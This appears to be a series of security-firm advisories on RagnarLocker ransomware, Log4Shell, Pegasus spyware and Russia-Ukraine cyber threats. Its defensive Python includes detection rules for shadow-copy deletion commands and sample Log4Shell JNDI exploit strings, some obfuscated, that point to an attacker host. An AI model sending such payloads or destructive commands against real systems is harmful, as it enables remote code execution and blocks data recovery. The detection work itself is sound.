Introduction

It is no secret that critical infrastructure is on cyber watch here in the United States. On March 7th, the FBI issued a FLASH warning regarding a strain of ransomware called RagnarLocker. At least 52 organizations across 10 critical infrastructure sectors have been affected by this variant of ransomware since the FBI first identified it in 2020. The list includes government agencies, manufacturing companies, financial services firms, and information technology firms. The threat actors behind RagnarLocker work with other criminal groups and constantly change the methods they use to distribute the ransomware.

How It Works

RagnarLocker ransomware is complex and operates in the following way:

1. It checks the locale of the infected machine using the Windows API GetLocaleInfoW (the configured Windows language and region setting, not a geolocation lookup) and terminates the encryption process if the locale is "Azerbaijani," "Armenian," "Belorussian," "Kazakh," "Kyrgyz," "Moldavian," "Tajik," "Russian," "Turkmen," "Uzbek," "Ukrainian," or "Georgian."
2. To prevent double encryption and corrupted data, it checks whether the machine is already infected.
3. It then identifies all attached hard drives and assigns a drive letter to any volume that does not yet have one, so that every volume is accessible and can be encrypted.
4. It examines all services running on the infected machine and terminates any service used for remote administration, so that managed service providers and remote-support tooling are less likely to detect or interrupt the attack.
5. It then attempts to delete all Volume Shadow Copies, which further disrupts an organization's ability to recover data from the infected computer.
6. Lastly, it encrypts all available files. Instead of choosing which files and folders to encrypt, it chooses which to exclude. In general, it excludes core Windows OS files so that the machine keeps running during the encryption process.
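Steps 4 and 5 above are the behaviours a detection engineer can hunt for most reliably, because they show up as ordinary process-creation telemetry before any file is encrypted. The following is an added example written for this advisory, not code from the FBI FLASH or from nGuard: it runs simple rules over constructed Windows process-creation events (Sysmon Event ID 1 / Security 4688 fields flattened to key=value form). The command-line patterns are generic ransomware tradecraft rather than a claim about RagnarLocker's exact command strings, and the list of remote-administration service names is an assumption to be tuned to the products actually deployed in an environment.

```python
"""Flag process-creation events that match shadow-copy deletion (step 5) and
remote-administration service termination (step 4).

Added example by the editor, not code from the FBI FLASH or from nGuard.
The events below are constructed to resemble Sysmon Event ID 1 / Security
4688 telemetry in key=value form; the command-line patterns are generic
ransomware tradecraft, not RagnarLocker's exact command strings.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str
    cmdline: str


# Commands commonly used by ransomware to destroy shadow copies or disable
# Windows recovery. Case-insensitive and tolerant of extra whitespace.
SHADOW_COPY_PATTERNS = [
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"Win32_ShadowCopy.*\.Delete\(", re.I),
    re.compile(r"bcdedit(?:\.exe)?.*recoveryenabled\s+no", re.I),
]

# Services an operator stops so remote-support and backup tooling loses sight
# of the host. Assumed list for this example; tune to your environment.
REMOTE_ADMIN_SERVICES = {"teamviewer", "anydesk", "vncserver", "kaseya", "connectwise"}
SERVICE_STOP = re.compile(
    r'(?:net1?(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|Stop-Service(?:\s+-Name)?)\s+"?(?P<svc>[\w\-]+)',
    re.I,
)

# key=value tokens; a quoted value may contain spaces.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> ProcessEvent:
    fields = {k: (q or u) for k, q, u in KV.findall(line)}
    return ProcessEvent(fields["host"], fields["user"], fields["image"], fields["cmdline"])


def classify(event: ProcessEvent) -> list[str]:
    """Return the suspicious behaviours seen in one event (empty if benign)."""
    findings: list[str] = []
    if any(p.search(event.cmdline) for p in SHADOW_COPY_PATTERNS):
        findings.append("shadow_copy_deletion")
    for m in SERVICE_STOP.finditer(event.cmdline):
        svc = m.group("svc").lower()
        if svc in REMOTE_ADMIN_SERVICES:
            findings.append(f"remote_admin_service_stop:{svc}")
    return findings


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (host, findings) for every event that triggered at least one rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        found = classify(ev)
        if found:
            hits.append((ev.host, found))
    return hits


# Constructed sample telemetry (not real data). WS05 and WS06 are benign
# administrator activity and must not alert.
SAMPLE_EVENTS = [
    r'host=WS01 user=CORP\jdoe image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c vssadmin delete shadows /all /quiet"',
    r'host=WS02 user=CORP\jdoe image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic.exe shadowcopy delete"',
    r'host=WS03 user=CORP\svc_backup image=C:\Windows\System32\net.exe cmdline="net stop TeamViewer"',
    r'host=WS04 user=CORP\jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NoP -c Stop-Service -Name AnyDesk -Force; vssadmin delete shadows /all"',
    r'host=WS05 user=CORP\backupadmin image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin list shadows"',
    r'host=WS06 user=CORP\helpdesk image=C:\Windows\System32\net.exe cmdline="net stop Spooler"',
]

if __name__ == "__main__":
    for host, findings in scan(SAMPLE_EVENTS):
        print(host, ", ".join(findings))
```

A single "vssadmin delete shadows" from an account that is not a backup operator is a high-confidence signal on its own; the service-stop rule is noisier and is best correlated with the shadow-copy rule or with a burst of file renames from the same process.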
Many times attackers will use the increasingly popular "double extortion" tactic: the attacker first exfiltrates sensitive data, then triggers the encryption attack, and threatens to leak the stolen data if the target refuses to pay the ransom.

Indicators of Compromise

The FBI FLASH warning, on page 3, lists a number of Indicators of Compromise (IOCs) associated with RagnarLocker ransomware. Below are some examples of these IOCs.

Conclusion

The FBI's standing recommendation is not to pay the ransom, because paying emboldens attackers to use these techniques against other organizations. The FBI also urges that all ransomware attacks be reported, which gives investigators and analysts the information they need to track ransomware operators and, ideally, prevent future attacks. If your organization has fallen victim to a ransomware attack, nGuard can help. Our incident response team is readily available to assist your organization. Preventative measures such as penetration testing and strategic security assessments can reduce the risk of such attacks in the first place.
Target: Water Utilities

Water utilities play a critical role in our society. They provide fresh, potable water to residents, businesses and industry, and manage the wastewater from them. As with other utilities and critical infrastructure, they are increasingly a target for hackers, terrorists, and hostile nation states. A successful attack can contaminate the fresh water supply, impair availability, or cause an environmental disaster. It is a direct risk to the health of the local population and to the supply chains that depend on readily available fresh water and wastewater management.

Becoming a Hard Target

Managing the risks isn't trivial, but it's not rocket science either: the science of cyber security has greatly matured over the past 20 years. The following 5 steps are key to a water utility becoming a hard target that is resistant to cyberattacks.

1. Assess your overall cyber security program.
2. Test your organization's current readiness for cyber attacks on an annual basis by assessing both your external perimeter and your internal networks. Make sure you include both the IT and the OT (SCADA) sides of the house.
3. Perform ongoing vulnerability management throughout the year.
4. Make sure you have someone watching for suspicious security events.
5. Lastly, make sure you have a Cyber Security Incident Response (CSIR) program in place. Because a cyber security incident is a question of when, not if, you must have a plan in place before it happens.

Strength In Numbers

Recognizing the critical importance of the water supply, leading water associations in the U.S., along with the U.S. federal government, have become increasingly organized in the defense of this essential infrastructure. A key part of this organization has been the formation of the Water Information Sharing and Analysis Center (WaterISAC). Authorized by the United States' 2002 Bioterrorism Act, WaterISAC is the key security information source for all threats impacting water and wastewater systems.
In support of its mission, WaterISAC has developed the 15 Cybersecurity Fundamentals for Water & Wastewater Utilities. As part of its ongoing education and outreach, WaterISAC recently invited nGuard to speak about some of these key cybersecurity concepts at an association meeting. You can watch this webinar below.
Russia has launched a full-scale military invasion of Ukraine, and with that comes an increased risk of cyber attacks across the globe. Over the last couple of weeks, we have seen many of these threats come to fruition as Ukrainian websites were defaced and taken offline. New strains of data-destroying malware were also found deployed on critical government systems. Below are some of the most current cyber incidents taking place as a result of recent Russian aggression.
More than 70 Ukrainian government websites have been defaced in cyberattacks (npr.org)
In an NPR interview with host Mary Louise Kelly, cybersecurity correspondent Jenna McLaughlin detailed a series of cyber attacks that left about 70 Ukrainian government websites defaced. Hackers posted threatening messages in multiple languages telling visitors to be afraid and expect the worst. McLaughlin said these attacks were unsophisticated operations linked to a hacking group located in Russia and Belarus.
Ukrainian crisis: ‘Wiper’ discovered in latest cyber-attacks (bbc.com)
Late last week, BBC reported that while the websites of several Ukrainian banks and government offices became inaccessible, "wiper" malware (which ESET named HermeticWiper) was also being deployed on compromised systems. This malware locates and destroys data on system drives rather than encrypting it for ransom. "ESET telemetry shows that the malware was installed on hundreds of machines in the country."
Biden has been presented with options for massive cyberattacks against Russia (nbcnews.com)
Last Thursday, NBC News reported that President Biden had been presented with a menu of options for the United States to carry out impactful cyber attacks against Russia in response to its military action against Ukraine. Two U.S. intelligence officials said that while no final decision had been made, all options remained on the table. "You could do everything from slow the trains down to have them fall off the tracks," one person briefed on the matter said.
Russian ransomware gang threatens countries that punish Moscow for Ukraine invasion (politico.com)
Last Friday, Politico reported that the Russian ransomware gang Conti was threatening to hack the critical infrastructure of any nation or organization that retaliates against Russia for its military operations in Ukraine. The Conti gang declared its full support for the Russian government. This group is well known for ransomware attacks across the globe that have had devastating impacts.
Anonymous Hacking Group Declares “Cyber War” Against Russia (infosecurity-magazine.com)
The hacking collective Anonymous has made it known that it will launch a retaliatory cyber campaign against the Russian government following Russia's invasion of Ukraine. A post from a Twitter account associated with the collective last Thursday read "The Anonymous collective is officially in cyber war against the Russian government. #Anonymous #Ukraine." Shortly after this tweet was posted, the group claimed to have taken down multiple Russian government websites.
The United States government has issued strong warnings to organizations reiterating the need for a strong security posture during these uncertain times. nGuard account executives are ready to discuss any and all cyber security needs to help boost your organization's readiness.
NSO Group continues to stay at the top of the headlines as 2022 carries on. There have been 3 noteworthy updates since the last nGuard Security Advisory, let’s look into each. If you haven’t seen the prior Security Advisories covering the NSO Group they can be found here, here, and a video summary here.
FBI discloses it tested the Pegasus spyware in 2019
Earlier this month, the FBI and the Justice Department confirmed they had tested Pegasus but stated it had not been deployed in any of their investigations. In its statement the FBI said: "The FBI works diligently to stay abreast of emerging technologies and tradecraft — not just to explore a potential legal use but also to combat crime and to protect both the American people and our civil liberties. That means we routinely identify, evaluate, and test technical solutions and problems for a variety of reasons, including possible operational and security concerns they might pose in the wrong hands. There was no operational use in support of any investigation; the FBI procured a limited license for product testing and evaluation only." NSO Group has since been added to the U.S. Commerce Department's Entity List; however, The New York Times reported that the FBI ran up roughly $5 million in charges on its contract with NSO Group before that happened.
Although NSO Group has stated it cannot deploy Pegasus against U.S.-based phones with a +1 number, it has created another product, called Phantom, that allows monitoring of those numbers. Westbridge, NSO's North American branch, was handing out this brochure for Phantom to law enforcement. It looks very similar to the one leaked for Pegasus when this story originally broke last year.
NYPD Received Demo of Pegasus
The NYPD intelligence group was in communication to receive a demo of the Pegasus software, as seen in the email below courtesy of Motherboard. The brochure is very similar to the one the FBI received from Westbridge.
The email came from James Sheehan who is a program manager for Northern New Jersey-Newark and Jersey City Urban Area Security Initiative, which is administered by the United States Department of Homeland Security (DHS). Others that were invited to attend the demonstration were Bergen County Prosecutor’s Office, Jersey City’s public safety agency, and the Paterson Police Department. The NYPD has not responded to these revelations, so it is still unknown if they took any steps to acquire the Pegasus software.
The Israeli Government Announced its Investigation into Domestic Use of Pegasus
As more and more eyes have focused on NSO Group, Israel has announced that it is investigating reports that Israeli police illegally used Pegasus against its own citizens without a court order. One individual reported to have been spied on is a witness in the trial of former Israeli Prime Minister Benjamin Netanyahu. Pegasus continues to draw negative attention and is being labeled a "threat to democracy," with cabinet minister Ayelet Shaked saying, "I am shocked. I cannot believe this is my country."
Israeli police have reportedly used Pegasus since 2015 and deployed it against over 100 phones each year since. In a recently revealed list, it seems as if nobody was immune: the list includes protesters, ministry CEOs, and journalists. It was also used to assess witness credibility. When the news about Pegasus first broke last year, it emerged that Pegasus had been used against all types of individuals throughout the world, but nobody knew it had been used domestically in Israel against its own people.
Threats Are on The Rise
As tensions rise on the border between Russia and its southwestern neighbor Ukraine, threats of cyber attacks have the Western world on edge. There have been nearly 500 documented cyber attacks affecting the geopolitical landscape around the globe since 2009, with approximately 30% originating from Russia or China. History shows that Russia has found success in launching cyber attacks against nations it feels "threaten their long-term national security." On January 23rd, 2022, the Department of Homeland Security (DHS) released a memo stating "Russia maintains a range of offensive cyber tools that it could employ against US networks—from low-level denials-of-service to destructive attacks targeting critical infrastructure."
History of Conflict
Since the 2014 annexation of Crimea by the Russian Federation, cyber attacks have been a recurring feature of this conflict. In December 2015, Russian hackers compromised three Ukrainian energy distribution companies, disrupting the electricity supply for over 230,000 Ukrainians. These complex attacks followed an attack path that adversaries still use today: spear-phishing campaigns led to the seizure of Supervisory Control And Data Acquisition (SCADA) systems, accompanied by telephone denial-of-service attacks on customer call centers, the destruction of critical file servers, and the disabling of OT infrastructure components.
Current Conflict
In 2022, it seems that the Kremlin is more than ready to reuse the cyber tactics it employed around the 2014 annexation of Crimea. On January 15th, 2022, Microsoft reported destructive malware on the systems of multiple Ukrainian government agencies, shortly after dozens of Ukrainian government websites were defaced with the message "be afraid and expect the worst."
Russia is suspected of using similar tactics to launch “false-flag” operations that are intended to stir up domestic tension in Ukraine and/or cast blame on Ukraine for the conflict. U.S. and international information security teams are ramping up preparations for any possible scenario as diplomatic negotiations continue.
Preventative Measures
The continued discovery of critical vulnerabilities affecting internet-facing systems (see Log4j) requires organizations to conduct ongoing vulnerability scanning and penetration testing to ensure attackers can't gain a foothold on internal networks. With internal security awareness training and table-top exercises, both regular employees and information security teams can be prepared for any scenario. As a leading provider of cyber security services, nGuard is ready to discuss your organization's needs and help implement protective measures.
Overview
On December 10th, 2021, CVE-2021-44228 (Log4Shell), affecting the Log4j Java logging framework, was publicly disclosed. This vulnerability received the highest possible CVSS score of 10 out of 10. Three other Log4j vulnerabilities have been published since then (CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832), but the original is the most critical by far. It was initially discovered by Chen Zhaojun of Alibaba's cloud security team on November 24th, 2021 and privately disclosed to Apache. The risk of this vulnerability is so severe that, as a precautionary measure, the government of Quebec, Canada, shut down nearly 4,000 public-facing sites. Since the public release there have been reports of millions of exploitation attempts across the world, but as of January 10th CISA stated it had not seen any significant intrusions related to Log4j.
So, what is Log4j, what makes it so vulnerable, and how do you exploit it?
Log4j is an open-source Java logging library, maintained by a small group of volunteers under the Apache Software Foundation, that applications use to record events such as user requests, error conditions, and diagnostic messages. An example of logged activity would be a user navigating to a broken link on a web page and receiving a 404 error; other examples are diagnostic messages such as memory usage or commands entered by users. Logging this information isn't the issue. The issue is that Log4j actively interprets the strings it logs: its lookup feature expands expressions wrapped in ${…}, and one of the supported lookups uses the Java Naming and Directory Interface (JNDI) to fetch values from naming services such as LDAP or RMI, both inside and outside your network. If an attacker can get a string such as ${jndi:ldap://attacker-host:port/x} into any logged field (a User-Agent header, a username, a chat message), the vulnerable server connects to the attacker's LDAP server, which replies with a reference to a remote Java class; the JVM loads and runs that class, giving the attacker full remote code execution on the host. For example, a crafted input could make the server reach out to an attacker's machine on port 9999 and download the malware file being hosted there.
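Because the lookup syntax is expanded recursively, attackers quickly moved past the plain ${jndi:...} string to nested forms such as ${${lower:j}ndi:...} and URL-encoded variants that defeat naive grep-style detection. The following is an added example written for this advisory, not code from nGuard or from the Log4j project: it normalises the common obfuscations the same way a vulnerable Log4j would evaluate them and then looks for the jndi: lookup in raw web server log lines. The log lines are constructed (203.0.113.10 is a documentation address), and the normaliser models only URL-encoding and the ${lower:}, ${upper:} and ${x:-default} lookups; it is a triage aid, not a complete Log4j lookup interpreter.

```python
"""Detect Log4Shell exploitation attempts in web server logs, including the
obfuscated nested-lookup forms attackers used to evade ${jndi: string matching.

Added example by the editor; not code from nGuard or from the Log4j project.
The access-log lines are constructed (203.0.113.10 is a documentation
address). Only URL-encoding and the lower/upper/default lookups are modelled.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# One innermost ${...} expression: a body containing no further ${ or }.
INNER = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# The lookup we are hunting for, once obfuscation has been stripped.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.I)


def _resolve(body: str) -> str | None:
    """Evaluate one innermost lookup the way a vulnerable Log4j would, or return
    None to leave it in place (the jndi: lookup itself, or lookups not modelled)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j} and ${::-j}: an undefined lookup falls back to its default value
        return body.split(":-", 1)[1]
    return None


def _repl(m: re.Match) -> str:
    r = _resolve(m.group("body"))
    return m.group(0) if r is None else r


def normalize(s: str, max_rounds: int = 16) -> str:
    """URL-decode, then collapse nested lookups from the inside out until the
    string stops changing. Bounded so pathological input cannot loop forever."""
    s = unquote(unquote(s))
    for _ in range(max_rounds):
        new = INNER.sub(_repl, s)
        if new == s:
            break
        s = new
    return s


def find_jndi_attempts(lines: list[str]) -> list[dict]:
    """Scan raw log lines (any field: path, headers, user agent) and return one
    record per line that carries a jndi: lookup after normalisation."""
    hits = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append({"line": idx, "scheme": m.group("scheme").lower(),
                         "host": m.group("host"), "normalized": norm})
    return hits


# Constructed Apache combined-format lines. Line 0 is benign traffic; line 5 is
# a non-JNDI lookup and must not be reported as an exploitation attempt.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:ldap}://203.0.113.10/x}"',
    '203.0.113.10 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://203.0.113.10:1099/obj}"',
    '198.51.100.8 - - [10/Dec/2021:10:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${java:version}"',
]

if __name__ == "__main__":
    for hit in find_jndi_attempts(SAMPLE_LOG):
        print(hit["line"], hit["scheme"], hit["host"])
```

The scanner deliberately works on the whole raw line rather than a parsed field, because the payload can arrive in any header or parameter that the application happens to log. Seeing the lookup in your logs proves an attempt, not a compromise; the outbound LDAP or RMI connection from the server to the reported host is what confirms a vulnerable instance.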
Products affected
At this time, it is safest to assume that any Java-based product may be affected until proven otherwise, as Log4j has turned out to be deeply embedded in a great deal of software, in some cases without the vendor being aware of it. Popular products such as Minecraft, Apple's iCloud, AWS services, and the NSA's reverse engineering tool Ghidra were affected, and the list goes on. CISA continues to update its GitHub repository with a list of known affected products.
Detection & Patching
To discover what systems to patch, here are a few steps to take:
- Identify any internet facing assets.
- Use authenticated vulnerability scanning to detect devices that have been impacted.
- If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
- Determine the version of Log4j being used. Versions 2.0-beta9 through 2.14.1 are vulnerable to CVE-2021-44228; 2.15.0 and 2.16.0 closed the original hole but are affected by the follow-on CVEs. Remember that the library is often bundled inside application archives (fat JARs, WARs, EARs) rather than installed as a standalone file.
- Update to the current version: 2.17.1 for Java 8 and later (2.12.4 for Java 7 and 2.3.2 for Java 6). Where upgrading is not immediately possible, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core JAR, which is the mitigation Apache recommends for older releases; then upgrade as soon as you can.
- Repeat the above steps on internal IT and OT systems.
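Vulnerability scanners and EDR searches cover the easy cases; the copies that get missed are log4j-core JARs nested inside application archives. The following is an added example written for this advisory, not a tool from nGuard, CISA or Apache: it walks a directory tree, opens every archive (recursing into nested JARs, WARs and EARs), reads the log4j-core Maven metadata to get the version, applies the published fix versions per support branch, and reports whether the JndiLookup class is still present. The demo() fixture is constructed in a temporary directory and contains placeholder bytes rather than real class files. A shaded or relocated log4j-core whose Maven metadata path was rewritten will not be recognised by this scanner, so treat its output as a floor, not a ceiling.

```python
"""Find log4j-core copies on disk (including JARs nested in application
archives), read their version, and classify them against the published
Log4j fix versions.

Added example by the editor, not a tool from nGuard, CISA or Apache. The
demo() fixture is constructed in a temporary directory; the JndiLookup
"class" it writes is placeholder bytes, not a real class file.
"""
from __future__ import annotations

import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text: str) -> tuple[int, int, int]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)  # "2.0-beta9" -> (2, 0, 0)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else (0, 0, 0)


def assess(version: str, jndi_present: bool = True) -> str:
    v = parse_version(version)
    if v[0] != 2:
        return "not log4j 2"
    minor = v[1]
    # Fully patched release per support branch: Java 6 -> 2.3.2, Java 7 -> 2.12.4, Java 8+ -> 2.17.1
    fully = {3: (2, 3, 2), 12: (2, 12, 4)}.get(minor, (2, 17, 1))
    # First release closing CVE-2021-44228 per branch: 2.3.1, 2.12.2, 2.15.0
    rce_fixed = {3: (2, 3, 1), 12: (2, 12, 2)}.get(minor, (2, 15, 0))
    if v >= fully:
        return "patched"
    if v < rce_fixed:
        return "VULNERABLE CVE-2021-44228" if jndi_present else "mitigated (JndiLookup removed); upgrade"
    return "partially patched; upgrade"


def inspect_archive(zf: zipfile.ZipFile, path: str, findings: list[dict]) -> None:
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        present = JNDI_CLASS in names
        findings.append({"path": path, "version": version,
                         "jndi_lookup_present": present, "assessment": assess(version, present)})
    for name in names:  # fat JARs and WARs: recurse into nested archives held in memory
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{path}!/{name}", findings)
            except zipfile.BadZipFile:
                pass


def scan_tree(root: str) -> list[dict]:
    findings: list[dict] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(p) as zf:
                        inspect_archive(zf, p, findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda x: x["path"])


def _log4j_core_jar(version: str, include_jndi: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core JAR (metadata only, no real classes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes only
    return buf.getvalue()


def demo() -> list[dict]:
    """Build a constructed tree in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    os.makedirs(os.path.join(root, "legacy"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_log4j_core_jar("2.14.1"))                       # unpatched
    with open(os.path.join(root, "legacy", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(_log4j_core_jar("2.14.1", include_jndi=False))   # JndiLookup removed
    with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as fat:  # fat JAR with nested copy
        fat.writestr("BOOT-INF/lib/log4j-core-2.17.1.jar", _log4j_core_jar("2.17.1"))
    return scan_tree(root)


if __name__ == "__main__":
    for r in demo():
        print(r["assessment"], r["version"], r["path"])
```

Run scan_tree against application roots, container image layers and installer caches, and feed the "VULNERABLE" and "partially patched" results into your patching queue; the "mitigated" results still warrant an upgrade because the class-removal workaround does nothing for the later Log4j CVEs.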
To reduce the chance of Log4j being exploited while you patch, there are a few steps to take. Treat IP block lists as a stopgap: scanning sources change constantly, so blocking is no substitute for upgrading or removing the JndiLookup class.
- Search logs for IP addresses known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
- Block a list of IPs that have been used to host a malicious payload to execute the vulnerability.
- Review the list of IOCs being updated by Microsoft.
- Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.
Additional links
There have been many articles and resources published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional resources for further reading.
- If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
- A growing list of Tenable Nessus plugins being released for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
- The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
- The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
- CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner
If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.